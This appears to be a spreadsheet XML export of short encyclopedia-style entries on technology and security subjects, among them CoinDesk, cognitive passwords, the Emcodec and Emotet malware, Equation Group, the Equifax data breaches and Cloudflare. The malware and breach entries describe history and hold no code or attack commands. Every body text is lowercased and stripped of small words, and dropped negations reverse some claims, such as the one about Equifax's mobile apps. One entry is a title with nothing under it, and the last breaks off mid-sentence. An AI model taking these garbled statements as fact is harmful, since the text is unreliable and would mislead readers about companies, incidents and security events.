    <t>coindesk news site specializing bitcoin digital currencies. coindesk also provides guides bitcoin digital currencies. founded shakil khan, site subsequently acquired digital currency group. history coindesk founded serial entrepreneur shakil khan began publishing 2013. khan also investor bitpay, bitcoin payment processor. september 2013, matonis, former executive director bitcoin foundation, joined coindesk contributing editor.in january 2016, coindesk acquired digital currency group estimated amount us$500k-600k.in january 2017, company acquired lawnmower, blockchain data research platform. december 2017, coindesk established coindesk korea collaboration 22nd century media co., subsidiary hankyoreh co., ltd. provide blockchain news service south korea. january 2021, company acquired tradeblock, cryptocurrency data analytics firm. bitcoin price index coindesk bitcoin price index (coindesk bpi) launched september 2013. bitcoin price index average bitcoin prices across bitcoin exchanges, began using price data bitstamp, btc-e campbx. although data used initially, withdrawal concerns customers, november 2013, added reduction risk premium option additional deposit/withdrawal methods". bitcoin exchange eventually removed index february 2014 "persistent failure meet index's standards inclusion".the index restored average three exchanges march 2014 inclusion bitfinex price data, according coindesk: "since decline gox, observed bitfinex able sustain dramatic increase share total volume u.s. dollar-denominated bitcoins traded".publications referenced bitcoin price index data price include bbc, wall street journal, reuters, york times, cnbc, bloomberg news. state bitcoin report february 2014, coindesk released first 'state bitcoin' report. report provide overview cryptocurrency trends, challenges, opportunities, also highlighting important developments last year. follow-up report 2014 highlighted venture capital investment bitcoin companies percent compared previous quarter, investment pouring european bitcoin startups. iphone april 2014, coindesk released app. includes news stories editorials, well 'bitcoin price index.' 2021, longer supported. references external links official website</t>
  </si>
  <si>
    <t>Cognitive password</t>
  </si>
  <si>
    <t>cognitive password form knowledge-based authentication requires user answer question, presumably something intrinsically know, verify identity. cognitive password systems researched many years currently commonly used form secondary access. they developed overcome common memorability strength problem exists traditional password. cognitive passwords, compared password systems, measured usage memorability guessability ratio. history research passwords authentication method struggled memorability strong security. passwords easily remembered easily cracked attackers. hand, strong passwords difficult crack also difficult remember. when passwords difficult remember, users write down, secrecy password compromised. early research trade-off security usability aimed develop password system utilized easily remembered personal facts encouraged user participation. this line research resulted concept associative password, password system based user selected cues responses. this concept associative passwords extended pre-specified questions answers users would expected know could easily recall. empirical analysis passwords human cognition resulted recommendation people expected remember four complex passwords.building upon idea questions later researchers developed series innovations cognitive passwords. pass faces used ability identify individuals social network particular cognitive strength recognizing faces. later work evaluating cues reified recommendation four passwords reasonable cognitive expectation.a historical overview various cues found specific design layout page impinge memorability strength. later work illustrated inclusion visual enabled strongly significant improvements trade-off memorability security. cognitive questions core cognitive password system lies cues. these photos faces, newspapers, images, graphical textual cues. early method assisting recall recommended later security questions. these questions designed memorable standard username/password authentication method. such, measure strength cognitive password memorability/guessability ratio. question development questions developed cognitive password systems classified either fact opinion based. fact based systems questions answers considered independent individual's feelings "what name high school attended?". opinion based questions opposite and, name implies, answers based personal opinions "what favorite color?" later research developed criteria question selection included generalized answerability, number potential answers, generalized lack ambiguity. first criterion suggested questions answerable (i.e. asking "when purchase first home?" users purchased homes). second criterion recommended selecting questions sufficiently large potential answers (i.e. asking "how many children have?" majority people would answer design goal questions unambiguous possible (i.e. asking "how many family members have?" confusion would included count). creating usable questions effective criterion persuasive, engaging questions.older people dealing normal cognitive decline aging respond well visual cues. tactile interactions make technology accessible. memorability guessability user's ability correctly recall password expected decrease time progresses. however, memorability cognitive passwords remains relatively stable time recall rates significantly higher traditional passwords. when fact opinion-based questions compared, fact-based questions likely correctly remembered opinion-based questions, still likely traditional passwords. cognitive questions, group averaged whole, show relatively high guessability, much higher traditional passwords analyzed individually, certain questions shown acceptable memorability/guessability ratios. examples following typical cognitive password questions: what mother's maiden name? favorite superhero? what dog's name what car's name? what favorite movie? what city born what favorite color? references works cited brown, alan (2004), "generating remembering passwords", applied cognitive psychology, (6): 641–651, doi:10.1002/acp.1014 bunnell, julie; (1997), "cognitive, associative conventional passwords: recall guessing rates", computers security, (7): 629–641, doi:10.1016/s0167-4048(97)00008-4 smith, sidney (1987), "authenticating users word association", human factors ergonomics society, (1): 135–138, doi:10.1177/154193128703100130 zviran, moshe; haga, william (1990a), "cognitive passwords: easy access control", computers security, (8): 723–736, doi:10.1016/0167-4048(90)90115-a zviran, moshe; haga, william (1999), "password security: empirical study", journal management information systems, (4): 161–185, doi:10.1080/07421222.1999.11518226, hdl:10945/40319 zviran, moshe; elrich, zippy (2006), "identification authentication: technology implementation issues", communications association information systems, (4): 90–105, doi:10.17705/1cais.01704 external links visual cognitive password authentication</t>
  </si>
  <si>
    <t>Code42</t>
  </si>
  <si>
    <t>Emcodec</t>
  </si>
  <si>
    <t>trojan.emcodec.e trojan horse mis-represented audio video codec windows-based pcs. exists various variants names media codec, ecodec, imediacodec, intcodec, pcodec, svideocodec, video icodec, qualitycodec, vcodec, codec, zcodec, zcodec began widely used spring 2005. when visiting certain sites, particular pornographic sites, attempting view video file site, user directed download software, purportedly order allow viewing video. furthermore, number websites mis-represent malware legitimate codec, inviting users download software, allegedly allow playback certain audio/video claims so-called codec. once executed, trojan copies program program files folder, changes registry keys displays fake eula supposed codec.zcodec reportedly changes machine's settings, monitors user's browsing acts adware.some versions trojan install malware called zlob, turn lead installation malicious fake "security programs" spywarequake, spyfalcon, winfixer malware; variants also install backdoor infected computer. references external links removal toolssmitfraudfix smitrem</t>
  </si>
  <si>
    <t>Emotet</t>
  </si>
  <si>
    <t>emotet malware strain cybercrime operation believed based ukraine. malware, also known heodo, first detected 2014 deemed prevalent threats decade. 2021 servers used emotet disrupted global police action germany ukraine brought control enforcement.first versions emotet malware functioned banking trojan aimed stealing banking credentials infected hosts. throughout 2016 2017, emotet operators, sometimes known mealybug, updated trojan reconfigured work primarily "loader," type malware gains access system, allows operators download additional payloads. second-stage payloads type executable code, emotet's modules malware developed cybercrime gangs. initial infection target systems often proceeds macro virus email attachment. infected email legitimate-appearing reply earlier message sent victim.it widely documented emotet authors used malware create botnet infected computers sell access infrastructure-as-a-service (iaas) model, referred cybersecurity community maas (malware-as-a-service), cybercrime-as-a-service (caas), crimeware. emotet known renting access infected computers ransomware operations, ryuk gang.as september 2019, emotet operation three separate botnets called epoch epoch epoch 3.in july 2020, emotet campaigns detected globally, infecting victims trickbot qbot, used steal banking credentials spread inside networks. some malspam campaigns contained malicious documents names "form.doc" "invoice.doc". according security researchers, malicious document launches powershell script pull emotet payload malicious websites infected machines. november 2020, emotet used parked domains distribute payloads. january 2021, international action coordinated europol eurojust allowed investigators take control disrupt emotet infrastructure. reported action accompanied arrests made ukraine.on november 2021, emotet samples emerged similar previous code, different encryption scheme used elliptic curve cryptography command control communications. emotet infections delivered trickbot, computers previously infected trickbot, soon began sending malicious spam email messages macro-laden microsoft word excel files payloads. noteworthy infections allentown, pennsylvania, city located pennsylvania, united states (2018) heise online, publishing house based hanover, germany (2019) kammergericht berlin, highest court state berlin, germany (2019) humboldt university berlin, university berlin, germany (2019) universität gießen, university germany (2019) department justice province quebec (2020) lithuanian government (2020) references</t>
  </si>
  <si>
    <t>Enigmail</t>
  </si>
  <si>
    <t>enigmail data encryption decryption extension mozilla thunderbird postbox provides openpgp public e-mail encryption signing. enigmail works microsoft windows, unix-like, operating systems. enigmail operate mail clients compatible pgp/mime inline microsoft outlook gpg4win package installed, gnome evolution, kmail, claws mail, gnus, mutt. cryptographic functionality handled privacy guard. default configuration, thunderbird seamonkey provide e-mail encryption signing using s/mime, relies x.509 keys provided centralised certificate authority. enigmail adds alternative mechanism cooperating users instead keys provided trust, relies multiple users endorse authenticity sender's recipient's credentials. principle enhances security, since rely centralised entity might compromised security failures engage malpractice commercial interests pressure jurisdiction resides. enigmail first released 2001 ramalingam saravanan, since 2003 maintained patrick brunschwig. both enigmail privacy guard free, open-source software. enigmail thunderbird popular setup.enigmail announced support "pretty easy privacy" (p≡p) encryption scheme joint thunderbird extension released december 2015. june 2016 note available 2016.enigmail also supports autocrypt exchange cryptographic keys since version 2.0.in october 2019, developers thunderbird announced built-in support encryption signing based openpgp thunderbird replace enigmail add-on. background change code base thunderbird, removing support legacy add-ons. since would require rewrite scratch enigmail, patrick brunschwig instead supports thunderbird team native implementation thunderbird. enigmail maintained thunderbird months release thunderbird support enigmail postbox unaffected. also privacy guard openpgp references external links official website</t>
  </si>
  <si>
    <t>Computer Online Forensic Evidence Extractor</t>
  </si>
  <si>
    <t>computer online forensic evidence extractor (cofee) tool kit, developed microsoft, help computer forensic investigators extract evidence windows computer. installed flash drive external disk drive, acts automated forensic tool live analysis. microsoft provides cofee devices online technical support free enforcement agencies. development distribution cofee developed anthony fung, former hong kong police officer works senior investigator microsoft's internet safety enforcement team. fung conceived device following discussions 2006 enforcement technology conference sponsored microsoft. device used 2,000 officers least countries.a case cited microsoft april 2008 credits cofee crucial zealand investigation trafficking child pornography, producing evidence arrest.in april 2009 microsoft interpol signed agreement interpol would serve principal international distributor cofee. university college dublin's center cyber crime investigations conjunction interpol develops programs training forensic experts using cofee. national white collar crime center licensed microsoft sole domestic distributor cofee. public leak november 2009, copies microsoft cofee leaked onto various torrent websites. analysis leaked tool indicates largely wrapper around utilities previously available investigators. microsoft confirmed leak; however spokesperson firm said anticipate possible availability cofee cybercriminals download find ways ‘build around' significant concern". device activated plugged port. contains tools graphical user interface help investigators collect data. software reported made three sections. first cofee configured advance investigator selecting data wish export, saved device plugging target computer. interface generates reports collected data. estimates cited microsoft state jobs previously took hours done cofee little minutes.cofee includes tools password decryption, internet history recovery data extraction. also recovers data stored volatile memory could lost computer shut down. decaf late 2009 tool named detect eliminate computer acquired forensics (decaf) announced uninvolved group programmers. tool would reportedly protect computers cofee render tool ineffective. alleged would provide real-time monitoring cofee signatures devices running applications cofee signature detected, decaf would perform numerous user-defined processes. these included cofee clearing, ejecting devices, contamination spoofing addresses. december 2009, decaf creators announced tool hoax part stunt raise awareness security need better forensic tools". also kali linux nubuntu windows bootable drive windows capable running data recovery/collection utilities references external links official website "microsoft computer online forensic evidence extractor (cofee)". microsoft corporation. archived original 2012-06-21. retrieved 2009-10-17. "regular decaf? tool launched combat cofee". praetorian prefect. archived original 2009-12-18. retrieved 2009-12-18. "reactivating decaf minutes". praetorian prefect. archived original february 2014. retrieved 2009-12-18.</t>
  </si>
  <si>
    <t>Code Shikara</t>
  </si>
  <si>
    <t>code shikara computer worm, related dorkbot family, attacks social engineering. timeline 2011, code first identified danish cyber security company csis. av-company sophos reported november 2011 threat mainly spreads malicious links social network facebook.in 2013, bitdefender labs caught blocked worm, capable spying users' browsing activities, meanwhile stealing personal online/offline information and/or credentials, commonly known cybercrime. infection originally flagged online backup service mediafire, detected worm distributed camouflaged image file. despite misleading extension, mediafire successfully identified malicious image .exe-file. malicious shikara code poses .jpeg image indeed executable file. bot, malware simply integrated attackers control command server. besides stealing usernames passwords, herder also order additional malware downloads. mediafire taken steps address incorrect misleading file extensions update, identified displayed short description identifying specific file types. help users specific threat, file sharing service also blocked files double extensions, .jpg.exe, .png.exe, .bmp.exe. just like usual malware, backdoor.ircbot.dorkbot update installed victim's computer related devices.the biggest risk someone's facebook contacts account already compromised (due sloppy password security, granting access rogue application) account user allured clicking link seemingly posted friends. although links pretend point image, truth malicious screensaver hidden behind icon blonde women. after code launched attempts download malicious software hosted specific compromised israeli domain. malware currently present israeli website. remains message seemingly intruders, says: hacked explodemaster ufuqit likely using additional websites continuing spreading cyber attack(s). some popular baits tricking users click malicious links include rihanna taylor swift tapes. statistics niger: information kaspersky cybermap, shikara spam code ranking april 2017 number country niger 77.51% place sits linguistic analysis behind, 14.7%.code shikara mainly circulates following countries (statistics april 22nd 2017):afghanistan (81.27%) romania (78.58%) algeria (78.56%) india (78.46%) niger (77.51%) turkey (75.49%) also alert (ta15-337a) computer worm dorkbot (malware) malware references external links alert (ta15-337a) united states computer emergency readiness team (us-cert) technical information microsoft microsoft assists enforcement help disrupt dorkbot botnets technet.microsoft.com</t>
  </si>
  <si>
    <t>Enterprise Archive Solution</t>
  </si>
  <si>
    <t>enterprise archive solution (eas) enterprise file, social media email archiving software program originally developed educom 2000. subsequently acquired zantaz, autonomy currently owned unified global archiving. enterprise archive solution ability archive content various sources microsoft exchange, microsoft sharepoint, various file systems ntfs, social media twitter facebook, instant messaging microsoft skype. history enterprise archive solution (eas), previously called exchange archive solution, originally developed educom inc., ottawa-based software development firm. first release occurred march 2000. sold commercial software local installation. designed archive content microsoft exchange help organizations comply legal requirements e-mail retention, reduce storage load microsoft exchange, improve backup, .pst file management.from 2000 2004, educom released multiple versions, gained market share eventually acquired zantaz, inc. 2004. over next year, zantaz added additional functionality, released version officially renamed product enterprise archive solution.in 2005, used million users mentioned analyst international data corporation. 2007, zantaz estimated thousand customers.on july 2007, acquired autonomy, inc. cambridge, shortly acquisition, autonomy announced integrated autonomy's idol search technology.analyst gartner rated zantaz autonomy's products 2007.on october 2011, acquired inc. palo alto, ca.on july 2014, acquired capax discovery, inc. headquartered morristown, timeline version released march 2000 educom version released october 2000 educom version released april 2003 educom acquired zantaz, inc. february 2004 version released october 2004, october zantaz version released september 2006 zantaz version released june 2007 zantaz acquired autonomy july 2007 version idol released october 2007 autonomy acquired 2011 version released 2011 version 6.4.1 released august 2013 acquired capax global july 2014 version released march 2015 capax discovery version released july 2015 capax discovery version 6.9.5 released september 2015 capax discovery references website archiving solution windows file servers external links official product page november 2015 product roadmap</t>
  </si>
  <si>
    <t>Enterprise file synchronization and sharing</t>
  </si>
  <si>
    <t>enterprise file synchronization sharing (also known efss enterprise file sync share) refers software services enable organizations securely synchronize share documents, photos, videos files multiple devices employees, external customers partners. organizations often adopt technologies prevent employees using consumer-based file sharing apps store, access manage corporate data outside department’s control visibility. characteristics efss applications often characterized following features capabilities: sync files stored corporate storage user desktops devices send links large files support multiple file extensions protocols integration existing business applications apis, plugins mobile apps built-in file creation, editing previewing user access permissions files folders protection files stored transferred encryption, antivirus scanning, (data loss prevention) publish links files ability login requirement access data authentication options active directory, saml, azure active directory, etc. schedule automate file transfers automated systems repositoriesaudit report file activities system actionsdepending efss provider offers, services deployed using cloud computing, on-premises, hybrid. according forrester research, efss providers provide ability lockdown data certain geographies companies requirements store content/metadata specific jurisdictions. history box, first efss products, originally developed college project aaron levie student university southern california 2004. levie left school company full-time 2005.in 2007 dropbox founded, officially launched 2008's techcrunch disrupt conference. year, microsoft began beta testing windows live folders, predecessor onedrive. around 2010, efss market emerged vendors variety technology backgrounds including backup cloud storage (citrix sharefile, syncplicity), managed file transfer (accellion, biscom, box, hightail, thru), enterprise content management more. many developed alternatives consumer file sync sharing services security features place protect company information flexibility integrate existing content repositories business applications.in october 2011, software company, citrix systems, announced acquired private enterprise file sync share service, sharefile, citrix product line. sharefile competitor dropbox focused selling product departments large organizations.in 2012, ctera networks entered efss market.in july 2013, forrester research released first “forrester wave” report efss market identified scored products significant providers.on june 2014, google announced conference entering enterprise file sharing market release “google drive work.”in july 2014, gartner research released first “magic quadrant” report efss market. study evaluates strengths cautions notable vendors industry.in october, 2014, encrypted vendor tresorit entered efss market tresorit business. tresorit competitor dropbox box, promising businesses security privacy compliance end-to-end encryption.in april 2015, blackberry limited paid $100 million $150 million watchdox ltd. enterprise file sync sharing capabilities.in july 2015, efss vendor, syncplicity, sold private equity firm, skyview capital, previous owner, corporation. references</t>
  </si>
  <si>
    <t>Cloudike</t>
  </si>
  <si>
    <t>cloudike brandable file storage platform operated cloudike inc., headquartered jose, california. platform provides cloud storage, file synchronization contact synchronization, personal cloud, client software.the company's data storage approach similar dropbox, google drive, apple icloud store user data provide access files smartphones, laptops, tablets, etc. main difference apart functionality end-users (cloudike personal), cloudike offers customization businesses (cloudike enterprise) brands widely known white-label.cloudike started 2013 saas-platform grew multi-tier cloud solution used build white-label enterprise data storages oems, mobile internet service providers. also comparison file hosting services comparison file synchronization software comparison online backup services references external links official website alsco network solutions logiwa cloud fulfillment platform techcrunch review white label cloud storage</t>
  </si>
  <si>
    <t>Equation Group</t>
  </si>
  <si>
    <t>equation group, classified advanced persistent threat, highly sophisticated threat actor suspected tied tailored access operations (tao) unit united states national security agency (nsa). kaspersky labs describes sophisticated cyber attack groups world "the advanced seen", operating alongside creators stuxnet flame. most targets iran, russia, pakistan, afghanistan, india, syria, mali.the name originated group's extensive encryption. 2015, kaspersky documented malware infections group least countries, acknowledging actual number could tens thousands self-terminating protocol.in 2017, wikileaks published discussion held within possible identify group. commenter wrote "the equation group labeled report relate specific group rather collection tools" used hacking. discovery kaspersky security analysts summit held mexico february 2015, kaspersky announced discovery equation group. according kaspersky lab's report, group active since least 2001, actors. malware used operations, dubbed equationdrug grayfish, found capable reprogramming hard disk drive firmware. because advanced techniques involved high degree covertness, group suspected ties nsa, kaspersky identified actors behind group. probable links stuxnet 2015 kaspersky's research findings equation group noted loader, "grayfish", similarities previously discovered loader, "gauss",[repository] another attack series, separately noted equation group used zero-day attacks later used stuxnet; researchers concluded "the similar type usage exploits together different computer worms, around time, indicates equation group stuxnet developers either working closely together".: firmware they also identified platform times spread interdiction (interception legitimate sent scientific conference organizer mail),: platform "unprecedented" ability infect transmitted hard drive firmware several major hard drive manufacturers, create hidden disk areas virtual disk systems purposes, feat would require access manufacturer's source code achieve,: 16–18 tool designed surgical precision, going exclude specific countries allow targeting specific usernames discussion forums.: 23–26 codewords timestamps codewords "straitacid" "straitshooter" found inside malware. addition, timestamps malware seem indicate programmers worked overwhelmingly monday–friday would correspond 08:00–17:00 (8:00 5:00 workday eastern united states time zone. exploit kaspersky's global research analysis team, otherwise known great, claimed found piece malware contained stuxnet's "privlib" 2008. specifically contained exploit found stuxnet 2010. fanny classified worm affects certain windows operating systems attempts spread laterally network connection storage.[repository] kaspersky stated suspect equation group around longer stuxnet, based recorded compile time fanny. link iratemonk f-secure claims equation group's malicious hard drive firmware program "iratemonk", items catalog exposed 2013 spiegel article. iratemonk provides attacker ability software application persistently installed desktop laptop computers, despite disk formatted, data erased operating system re-installed. infects hard drive firmware, turn adds instructions disk's master boot record causes software install time computer booted capable infecting certain hard drives seagate, maxtor, western digital, samsung, ibm, micron technology toshiba. 2016 breach equation group august 2016, hacking group calling "the shadow brokers" announced stolen malware code equation group. kaspersky noticed similarities stolen code earlier known code equation group malware samples possession including quirks unique equation group's implementing encryption algorithm, therefore concluded announcement legitimate. recent dates stolen files june 2013, thus prompting edward snowden speculate likely lockdown resulting leak nsa's global domestic surveillance efforts stopped shadow brokers' breach equation group. exploits cisco adaptive security appliances fortinet's firewalls featured malware samples released shadow brokers. extrabacon, simple network management protocol exploit cisco's software, zero-day exploit time announcement. juniper also confirmed netscreen firewalls affected. eternalblue exploit used conduct damaging worldwide wannacry ransomware attack. also global surveillance disclosures (2013–present) united states intelligence operations abroad firmware hacking references external links equation group: questions answers kaspersky lab, version: 1.5, february 2015 fanny equation: father, stuxnet" kaspersky lab, february 2015fanny.bmp source github, november 2020technical write-up github, february 2021</t>
  </si>
  <si>
    <t>Equifax</t>
  </si>
  <si>
    <t>equifax inc. american multinational consumer credit reporting agency headquartered atlanta, georgia three largest consumer credit reporting agencies, along experian transunion (together known "big three"). equifax collects aggregates information million individual consumers million businesses worldwide. addition credit demographic data services business, equifax sells credit monitoring fraud prevention services directly consumers.equifax operates investments countries americas, europe, asia pacific. with 10,000 employees worldwide, equifax us$3.1 billion annual revenue traded york stock exchange (nyse) symbol efx.like credit reporting agencies, company required u.s. provide consumers free credit report every year.on august 2022, week mark begor deemed "uniquely qualified lead company" granted million dollar bonus package equifax's board, wall street journal reported equifax sent millions incorrectly-calculated credit scores lenders. equifax acknowledged reporting inaccurate credit scores, insisted errors affected people. following day, class-action lawsuit filed jacksonville, florida resident nydia jenkins equifax alleging received "substantially pricier loan" (resulting additional loan payment $2,352 year) equifax reporting credit score points been.equifax subject 57,000 consumer complaints consumer financial protection bureau october 2012 september 2017, complaints relating incomplete, inaccurate, outdated, misattributed information held company.in september 2017, equifax announced cyber-security breach, claims occurred mid-may july 2017, cybercriminals accessed approximately 145.5 million u.s. equifax consumers' personal data, including full names, social security numbers, birth dates, addresses, driver license numbers. equifax also confirmed least 209,000 consumers' credit card credentials taken attack. march 2018, equifax announced million additional u.s. customers affected breach, increasing number affected 147.9 million americans. company claims discovered evidence cybercrime event july 2017. residents united kingdom (15.2 million) canada (about 19,000) also impacted. vulnerability chinese hackers leveraged cve-2017-5638, hackers managed stay equifax systems undetected approximately days.in march 2018, security exchange commission accused ying, equifax's former cio, illicit insider trading, selling company stock breach publicly disclosed. after investigation fbi, ying pleaded guilty, sentenced four months prison plus year supervised release, fined $55,000.00 ordered restitution $117,117.61 june 2019. equifax manager, sudhakar reddy bonthu, also pleaded guilty insider trading received sentence months home confinement.in july 2019, york times, york post media reported equifax agreed approximately $650 million settle federal trade commission (ftc) resolve investigations several state attorneys general, consumer financial protection bureau, ftc, consumer class-action lawsuit related data breach.by september 2019, however, equifax added qualifications "hurdles" claims process doubt whether previously announced cash settlement $125 affected consumer would actually awarded.on december 2019, federal judge atlanta awarded class-action attorneys representing consumers approximately $77.5 million, suggesting individual consumers might expect receive around seven dollars. history equifax founded cator woolford atlanta, georgia, retail credit company 1899. 1920, company offices throughout united states canada. 1960s, retail credit company nation's largest credit bureaus, holding files millions american canadian citizens. even though company continued credit reporting, majority business making reports insurance companies people applied insurance policies, life, auto, fire medical insurance. also investigated insurance claims made employment reports people seeking jobs. most credit work done subsidiary, retailers commercial agency. retail credit company's information holdings willingness sell information attracted criticism 1960s 1970s. these included collected "... facts, statistics, inaccuracies rumors virtually every phase person's life; marital troubles, jobs, school history, childhood, life, political activities." company also alleged reward employees collecting derogatory information consumers.in 1970, company computerized records, wider availability personal information held, u.s. congress held hearings enactment fair credit reporting act. this legislation gave consumers rights regarding information stored corporate databanks. alleged hearings prompted retail credit company change name equifax 1975 improve image.equifax expanded commercial credit reports companies united states, canada came competition companies bradstreet experian. insurance reporting phased out. company also division selling specialist credit information insurance industry spun service, including comprehensive loss underwriting exchange (clue) database choicepoint 1997. equifax formerly offered digital certification services, sold geotrust september 2001. also 2001, equifax spun payment services division, forming publicly listed company certegy, subsequently acquired fidelity national information services 2006. certegy effectively became subsidiary fidelity national financial result reverse acquisition merger (see certegy fidelity national information services information).in october 2010, equifax announced acquiring anakam, identity verification software company headquartered diego, california, invented pioneered (text-message based) two-factor authentication. terms deal disclosed. equifax purchased ethority, business intelligence (bi) company headquartered charleston, south carolina, october 2011. ethority partnering talx, louis-based business unit equifax, remained charleston.in february 2016, equifax acquired australasian company veda, largest credit reference agency australia time. veda previously acquired australian market research opinion polling company reachtel september 2015., continues produce opinion polls australia.equifax workforce solutions contractors hired united states department health human services work healthcare.gov site.in july 2020, equifax reported that, purchasing ansonia credit data (ansonia), major source consumer credit, payments, invoice receivables (ar) data used financial companies borrowers businesses shipping logistics sectors, firm expanded position commercial payment technology solutions. products equifax primarily operates business-to-business sector, selling consumer credit insurance reports related analytics businesses range industries. business customers include retailers, insurance firms, healthcare providers, utilities, government agencies, well banks, credit unions, personal specialty finance companies financial institutions. equifax sells businesses credit reports, analytics, demographic data, software. credit reports provide detailed information personal credit payment history individuals, indicating honored financial obligations paying bills repaying loan. credit grantors information decide sort products services offer customers, terms. equifax also provides commercial credit reports containing financial non-financial data businesses sizes. equifax collects provides data national consumer telecom utilities exchange (nctue), exchange non-credit data including consumer payment history telecommunications utility accounts.in 1999, equifax began offering services credit consumer sector addition, credit fraud identity theft prevention products. equifax credit monitoring agencies required provide residents free credit file disclosure every months; annualcreditreport.com website incorporates data u.s. equifax credit records.equifax also offers fraud prevention products based device fingerprinting "fraudiq authenticate device." security failings according senator michael crapo, "the amount data private industry government collect store concerning. there intrinsic vulnerability collecting storing personal financial information, need meaningful discussion protect limit access it." 2016 advance-warnings insecure systems according october 2017 report motherboard, around december 2016, security researcher examining equifax's servers found online portal, created equifax employees only, accessible open internet. anything fancy," researcher told motherboard, explaining site vulnerable basic "forced browsing" bug. researcher requested anonymity professional concerns. "all search term millions results, instantly—in cleartext, app," said. total, researcher downloaded data hundreds thousands americans order show equifax vulnerabilities within systems. they said could downloaded data equifax's customers minutes: "i've seen things, bad." types sensitive private information american consumers (names, birth dates, social security numbers, etc.) exposed may–july breach, according motherboard. additionally, security researchers said able gain shell access equifax's servers discovered reported equifax additional vulnerabilities. according reporting, despite receiving warning security researcher, affected portal closed months later june, well march may–july breaches begun. moreover, employee portal reportedly server targeted later breaches, motherboard speculates suggest multiple breaches party occurred. march 2017 security breach september 2017, bloomberg news reported equifax victim "major breach computer systems" march 2017, early march begun "notifying small number outsiders banking customers" attack.according bloomberg, person familiar breach believed early-march intrusion carried party breached equifax's computer systems may. according bloomberg, equifax enlisted mandiant (owned fireeye, inc.) assist investigating march attack. cybersecurity firm hired following may–july breach. may–july 2017 data breach between july 2017, yet-identified hackers able known exploit equifax' servers updated access credit records million americans well british canadian citizens breach detected shut down. equifax disclosed breach september 2017, determining means scope breach. event considered "one biggest data breaches history."several consumers filed lawsuits small-claims court equifax breach, equifax later came $575 million settlement federal trade commission offer either cash payment credit monitoring affected breach. data breach seen black markets dark security experts, making difficult identify origin breach. however, february 2020, united states department justice indicted four members china's people's liberation army nine charges related breach, china denied. 2017 exposure argentine consumer data september 2017, brian krebs revealed argentine equifax left private data approximately 14,000 consumers, staff members, available anyone entered "admin" username password online systems. 2017 withdrawal vulnerable mobile apps september 2017, equifax announced large security breach, equifax removed official mobile apps apple store google play. while apps reportedly connected breach, security flaws own, vulnerable man-in-the-middle attacks owing parts using http instead https. 2017 exposure american salary data october 2017, krebs reported work number, website operated equifax's talx division, exposed salary histories employees tens thousands companies anyone possession employee's social security number date birth. roughly half population, latter pieces data known possession criminals, following equifax's may–july 2017 security breach. july 2019, equifax settled federal trade commission $700 million. this number contains $380,500,000 consumer restitution fund, part class action lawsuit. website malware october 2017, equifax's website reported offering visitors malware drive-by download. malware disguised update adobe flash. time, anti-malware products provided protection particular malware, meaning many visitors risk computers infected visiting equifax website.on october 2017, attack revealed performed hijacking third-party analytics javascript digital river brand fireclick.also october 2017, u.s. internal revenue service reported suspended $7.2 million contract equifax, result attack. lawsuits fines company fined federal trade commission occasions violating fair credit reporting ("fcra"). 2000, equifax, along experian transunion, fined $2.5 million blocking delaying phone calls consumers trying information credit. 2003, took equifax court reason settled lawsuit company fine $250,000.in july 2013, federal jury oregon awarded $18.6 million julie miller marion county equifax violations fair credit reporting act. lawsuit, miller alleged equifax merged credit reports another person different social security number, date birth, address. miller contacted equifax repeatedly writing telephone, equifax refused delete dozens false collection accounts miller's credit report. award included $18.4 million punitive damages, $180,000 compensatory damages. miller's lawyer, justin baxter, explained false reporting damaged miller's reputation, denied credit, private information given businesses miller relationship with. jury's verdict believed largest award individual case fair credit reporting act. equifax spokesperson said equifax considering appealing jury's verdict. federal judge reduced award $1.62 million 2014.in 2014, equifax heartland bank sued kimberly haman louis area reporting dead. heartland bank spokesperson said bank "immediately investigated contacted credit reporting agencies haman reported" still alive. equifax "spokesperson told post-dispatch equifax blocked heartland account information appearing haman's credit report reporter's inquiry."in april 2014, equifax sued york federal court gazarov, claimed company erroneously reports credit history unusual first name.on november 2017, reported group five oklahomans sued company, claiming equifax "violated laws require financial institutions protect security customers' personal information." equifax selected firm piper work case d.c. turned edelman earlier crisis control october 2017 privacy breach.consumer lawsuits claiming damages fcra successful small claims court.equifax software engineer sudhakar reddy charged insider trading purchasing options prior disclosure 2017 data breach.in january 2020, equifax agreed global settlement federal trade commission, consumer financial protection bureau, u.s. states territories. affected data breach, open suggestions file claims settlement includes $425 million help people affected data breach. equifax ultimately reached settlement regulators $700 million. also compuscan chinese cyberwarfare chinese espionage united states credit bureau credit score experian fair credit reporting identity theft innovis privacy laws united states talx work number transunion references external links official website equifax consumer identity protection website 2019 eligibility site related 2017 data breach business data equifax, inc.:</t>
  </si>
  <si>
    <t>Cloudflare</t>
  </si>
  <si>
    <t>cloudflare, inc. american content delivery network ddos mitigation company, founded 2010. primarily acts reverse proxy website's visitor cloudflare customer's hosting provider. headquarters francisco, california. history cloudflare founded september 2010 matthew prince, holloway, michelle zatlyn. prince holloway previously collaborated project honey pot, product unspam technologies. from 2009, company venture-capital funded. august 2019, cloudflare submitted filing york stock exchange stock ticker net. opened public trading september 2019 share.in 2020, cloudflare co-founder michelle zatlyn named president, making woman presidents publicly traded technology company u.s.cloudflare acquired web-services security companies, including stopthehacker (feb 2014), cryptoseal (june 2014), eager platform (december 2016), neumob (november 2017), systems (january 2020), linc (december 2020), zaraz (december 2021), vectrix (february 2022), area security (february 2022). since least 2017, cloudflare using wall lava lamps francisco headquarters source randomness encryption keys, alongside double pendulums london offices geiger counter singapore offices. lava lamp installation implements lavarand method, camera transforms unpredictable shapes "lava" blobs digital image. claims regarding ddos mitigation cloudflare received media attention june 2011 providing ddos mitigation website lulzsec, black hacking group.in march 2013, spamhaus project targeted ddos attack cloudflare reported exceeded gigabits second. patrick gilmore, akamai, stated time "the largest publicly announced ddos attack history internet." while trying defend spamhaus ddos attacks, cloudflare ended attacked well; google companies eventually came spamhaus' defense helped absorb unprecedented amount attack traffic.in february 2014, cloudflare claimed mitigated reflection attack unnamed european customer, stated peaked gbit/s. november 2014, reported gbit/s ddos attack hong kong. june 2020, mitigated ddos attack peaked gbit/s. july 2021 company claimed absorbed ddos attack three times larger they'd previously recorded, corporate blog implied tbit/s total. products cloudflare acts reverse proxy traffic. supports protocols including spdy http/2, quic, support http/2 server push.cloudflare provides ddos mitigation services protect customers distributed denial service (ddos) attacks. 2010, cloudflare launched content distribution network (cdn) service. techcrunch wrote goal masses".in 2017 cloudflare launched cloudflare workers, serverless computing platform creating applications, augmenting existing ones, without configuring maintaining infrastructure. expanded include workers low-latency key-value data store; cron triggers, scheduling cron jobs; additional tooling developers deploy scale code across globe.on september 2019, cloudflare released freemium service mobile devices called warp. year later, beta support macos windows released.as 2020, cloudflare providing services 100,000 customers.in 